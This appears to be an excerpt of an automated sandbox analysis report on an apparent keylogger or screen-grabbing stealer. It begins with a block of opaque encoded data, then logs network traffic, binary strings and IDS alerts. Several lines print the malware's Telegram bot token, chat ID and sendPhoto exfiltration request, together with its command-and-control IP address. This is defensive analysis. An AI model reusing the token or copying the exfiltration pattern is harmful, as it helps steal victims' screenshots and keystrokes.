OCBAEAbMNmig5OApzpS68eGOhrtbglrQn03jv+mqfepSBKEQ17EtEcfQG8Pd8VcSD2tSsmQflUV37qEKC5YcmGjWIb1eevLGVQMzx3Hgl8xRLWwYq971HfpwzO2lsVB1H4F8Eu9N9ZkQsRGQZBUYXWPFTXSsYlqoAa3eBe1Uqnd91ezyRtNeybcbqiWNvYdlhOqhDKi3fNvfGeNQGCqf0QZ6dwRaF1XZlOinbGQjQuCwmNsNLNIE5t1jJIPhhPuj5oG5SvbddKYWy6aOT8bAvBTCUcruCONe2anXasmTkvEvSV91D8mapdw8NLp7kzC4bHmWJKdDAJI0UmG1J0kDMBfLeX7CNJQQKVWvV4DJuTnyi5LooeoYsM4AYllifERdxR9nhFCWYMODyqy1RSHYy6t/MPvxckX/neQaBv/rra9VIHsl7rE37Qq7E2OZzBKxKZCBFO9YSiIbRcXkxP5y/fM0p8Jmz/Il/UaJkyPmpOApAQEHJzJNG72+EVOS7uVn90OxXI09EXMSpbDn+8W5XpktZU3Rcs7M2hyVIPzju8oafx05QC4jvHhgE8Ko6z6a1oy4CXeru25T3cRDU6j50DMpufNtzL5Pb36cGBbzG1FotA8ulvtL4FZEkFUZACV0nuQPSqv/6X8fTuN4Ftx+U9fUrCtZwWpKc+PyJnwerA9z8Tnabwrz3r7Wpijf9isVryFk1KCnpN9YwF19BZpRxnnYS9xkhBDbSL1DwNxKrNyBbi2Tq5tkOXNfA4iEwJOThlYt0ix4/5FyZ/zx4vw1fXk+8DrWi5tl642NO8lA9Vh7WDJQHMXz/3C7yN7MLyIQX1D0Untw3Z5uy2MV5+vqTmrvupCaoLpPXL+azdB5h/kbrPmSF7F+vkrM91koEKJzWbGDYzVnI76W8xiuFOt6w3BR7SUYypmEYuilc9JU1DsHOEe4ybeZKbk+mKCGmC/JAbj+g73kZwbq59t5Dk8v28WH7T+x+aQC/2JSY1QnMpSqPkW4tVL6k/N685g3r8Z1gro8YUKZ5xeEGURcg4sTD/od+6351mtQ9lgHHT6/T0zUbUU1/l9evzTZ49W/iIzhYHpyhZ0snKjvf/fIH48ZdXlyvK3eMhTLSICBoNmZzNWdsiqZmtKOM5nZlT1PHSR3Q6KRy8EHXZ8/e5ipiTmzpKvvpflW0m6pE49rl47FSIHX1+bvHan66pYqamCmhe1xu7
                      Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.10:49782 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 195.201.57.90:443 -> 192.168.2.10:49788 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:49793 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49797 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:49824 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:49850 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:49876 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:49902 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:49928 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:49957 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:49983 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:49988 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:49989 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:49991 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:49992 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:49993 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:49994 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:49995 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:49996 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:49997 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:49998 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:49999 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50000 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50001 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50002 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50003 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50004 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50005 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50006 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50007 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50008 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50009 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50010 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50011 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50012 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50013 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50014 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50015 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50016 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50017 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50018 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50019 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50020 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50021 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50022 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50023 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50024 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50025 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50026 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50027 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50028 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50029 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50030 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50031 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50032 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50033 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50034 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50035 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50036 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50037 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50038 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50039 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50040 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50041 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50042 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50043 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50044 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50045 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50046 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50047 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50048 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50049 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50050 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50051 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50052 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50053 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50054 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50055 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50056 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50057 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50058 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50059 version: TLS 1.2
                      Source: Binary string: C:\Users\swagkek\source\repos\AntiVM\obj\Release\abc.pdb source: powershell.exe, 00000005.00000002.1372476794.0000027F80226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1372476794.0000027F804DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1392320209.0000027FFEAD0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000005.00000002.1372476794.0000027F8181B000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: costura=costura.costura.dll.compressed=costura.costura.pdb.compressed/gma.system.mousekeyhook]costura.gma.system.mousekeyhook.dll.compressed source: powershell.exe, 00000008.00000002.2741051863.00000225574F3000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\projects\globalmousekeyhook\MouseKeyHook\obj\Debug\Gma.System.MouseKeyHook.pdb source: powershell.exe, 00000008.00000002.2815168012.0000022560390000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: costura.costura.pdb.compressed source: powershell.exe, 00000008.00000002.2591788897.00000225487FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2741051863.00000225574F3000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256 source: powershell.exe, 00000008.00000002.2741051863.0000022557D59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2815409363.00000225603A0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2741051863.000002255777C000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: powershell.exe, 00000008.00000002.2741051863.0000022557D59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2815409363.00000225603A0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2741051863.000002255777C000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: costura.costura.pdb.compressed|||Costura.pdb|6C6000A5EAF8579850AB82A89BD6268776EB51AD|2608 source: powershell.exe, 00000008.00000002.2741051863.00000225574F3000.00000004.00000800.00020000.00000000.sdmp

                      Software Vulnerabilities

                      barindex
                      Suspicious execution chain found
                      Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 1810009 - Severity 1 - Joe Security ANOMALY Telegram Send Photo : 192.168.2.10:49797 -> 149.154.167.220:443
                      Uses the Telegram API (likely for C&C communication)
                      Source: unknownDNS query: name: api.telegram.org
                      Source: global trafficHTTP traffic detected: POST /bot7813041927:AAFJKTwPluPESj-jsG5TWsi6m7BDKrgz_Rk/sendPhoto?chat_id=-4630316859&parse_mode=Markdown HTTP/1.1Content-Type: multipart/form-data; boundary="9e5a8c58-a8d7-4adc-ac19-ba685bb25bb6"Host: api.telegram.orgContent-Length: 692632Expect: 100-continueConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                      Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
                      Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
                      Source: Joe Sandbox ViewIP Address: 195.201.57.90 195.201.57.90
                      Source: Joe Sandbox ViewIP Address: 195.201.57.90 195.201.57.90
                      Source: Joe Sandbox ViewASN Name: AS-REGRU AS-REGRU
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: Joe Sandbox ViewJA3 fingerprint: c12f54a3f91dc7bafd92cb59fe009a35
                      Source: unknownDNS query: name: api.ipify.org
                      Source: unknownDNS query: name: api.ipify.org
                      Source: unknownDNS query: name: ipwho.is
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0Host: ipwho.isConnection: Keep-Alive
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.124.205.6
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.124.205.6
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.124.205.6
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.124.205.6
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.124.205.6
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.124.205.6
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.124.205.6
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.124.205.6
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.124.205.6
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.124.205.6
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.124.205.6
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.124.205.6
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.124.205.6
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.124.205.6
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.124.205.6
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.124.205.6
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.124.205.6
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.124.205.6
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.124.205.6
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.124.205.6
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.124.205.6
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.124.205.6
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.124.205.6
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.124.205.6
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.124.205.6
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.124.205.6
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.124.205.6
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.124.205.6
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.124.205.6
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.124.205.6
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.124.205.6
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.124.205.6
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.124.205.6
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.124.205.6
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.124.205.6
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.124.205.6
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.124.205.6
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.124.205.6
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.124.205.6
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.124.205.6
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.124.205.6
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.124.205.6
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.124.205.6
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.124.205.6
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.124.205.6
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.124.205.6
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.124.205.6
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.124.205.6
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.124.205.6
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.124.205.6
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0Host: ipwho.isConnection: Keep-Alive
                      Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                      Source: global trafficDNS traffic detected: DNS query: ipwho.is
                      Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                      Source: unknownHTTP traffic detected: POST /bot7813041927:AAFJKTwPluPESj-jsG5TWsi6m7BDKrgz_Rk/sendPhoto?chat_id=-4630316859&parse_mode=Markdown HTTP/1.1Content-Type: multipart/form-data; boundary="9e5a8c58-a8d7-4adc-ac19-ba685bb25bb6"Host: api.telegram.orgContent-Length: 692632Expect: 100-continueConnection: Keep-Alive
                      Source: powershell.exe, 00000006.00000002.1507861844.000001BEE285E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org
                      Source: powershell.exe, 00000006.00000002.1507861844.000001BEE26FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                      Source: powershell.exe, 00000006.00000002.1592989522.000001BEFA143000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
                      Source: powershell.exe, 00000006.00000002.1507861844.000001BEE2899000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ipwho.is
                      Source: powershell.exe, 00000006.00000002.1594286288.000001BEFA2C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.a.0/sTy
                      Source: powershell.exe, 00000006.00000002.1594286288.000001BEFA2C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.hotosh
                      Source: powershell.exe, 00000005.00000002.1386901887.0000027F90081000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1372476794.0000027F81B22000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1386901887.0000027F901DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1507861844.000001BEE3B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1583652727.000001BEF2163000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2741051863.00000225574F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: powershell.exe, 00000008.00000002.2591788897.000002254773D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: powershell.exe, 00000006.00000002.1507861844.000001BEE26CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1507861844.000001BEE28F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org
                      Source: powershell.exe, 00000006.00000002.1507861844.000001BEE28F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1507861844.000001BEE26AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
                      Source: powershell.exe, 00000006.00000002.1507861844.000001BEE26CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1507861844.000001BEE28F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1507861844.000001BEE26AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/Logger
                      Source: powershell.exe, 00000005.00000002.1372476794.0000027F80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1507861844.000001BEE20F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2591788897.0000022547481000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 00000008.00000002.2591788897.000002254773D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: powershell.exe, 00000005.00000002.1372476794.0000027F80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1507861844.000001BEE20F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2591788897.0000022547481000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                      Source: powershell.exe, 00000006.00000002.1507861844.000001BEE25DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                      Source: powershell.exe, 00000006.00000002.1507861844.000001BEE25DC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1507861844.000001BEE3341000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1599632881.000001BEFA600000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2741051863.00000225574F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                      Source: powershell.exe, 00000006.00000002.1507861844.000001BEE26FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                      Source: powershell.exe, 00000006.00000002.1507861844.000001BEE3341000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1507861844.000001BEE26FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1599632881.000001BEFA600000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                      Source: powershell.exe, 00000006.00000002.1507861844.000001BEE26FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1598957271.000001BEFA4CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7813041927:AAFJKTwPluPESj-jsG5TWsi6m7BDKrgz_Rk/sendPhoto?chat_id=-463031
                      Source: powershell.exe, 00000008.00000002.2741051863.00000225574F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 00000008.00000002.2741051863.00000225574F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 00000008.00000002.2741051863.00000225574F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: powershell.exe, 00000008.00000002.2591788897.000002254773D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: powershell.exe, 00000008.00000002.2741051863.000002255777C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                      Source: powershell.exe, 00000008.00000002.2741051863.0000022557D59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2815409363.00000225603A0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2741051863.000002255777C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net6
                      Source: powershell.exe, 00000008.00000002.2741051863.0000022557D59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2815409363.00000225603A0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2741051863.000002255777C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                      Source: powershell.exe, 00000008.00000002.2741051863.0000022557D59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2815409363.00000225603A0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2741051863.000002255777C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                      Source: powershell.exe, 00000005.00000002.1372476794.0000027F81197000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1507861844.000001BEE3341000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                      Source: powershell.exe, 00000006.00000002.1507861844.000001BEE2883000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipwho.is
                      Source: powershell.exe, 00000006.00000002.1507861844.000001BEE2644000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1507861844.000001BEE2883000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2741051863.00000225574F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipwho.is/
                      Source: powershell.exe, 00000006.00000002.1507861844.000001BEE3341000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1599632881.000001BEFA600000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://ipwho.is/SSELECT
                      Source: powershell.exe, 00000006.00000002.1507861844.000001BEE2644000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipwho.isp
                      Source: powershell.exe, 00000005.00000002.1386901887.0000027F90081000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1372476794.0000027F81B22000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1507861844.000001BEE3B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1583652727.000001BEF2163000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2741051863.00000225574F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: powershell.exe, 00000008.00000002.2741051863.0000022557D59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2815409363.00000225603A0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2741051863.000002255777C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                      Source: powershell.exe, 00000008.00000002.2741051863.0000022557D59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2815409363.00000225603A0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2741051863.000002255777C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2591788897.0000022548849000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                      Source: powershell.exe, 00000008.00000002.2741051863.0000022557D59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2815409363.00000225603A0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2741051863.000002255777C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
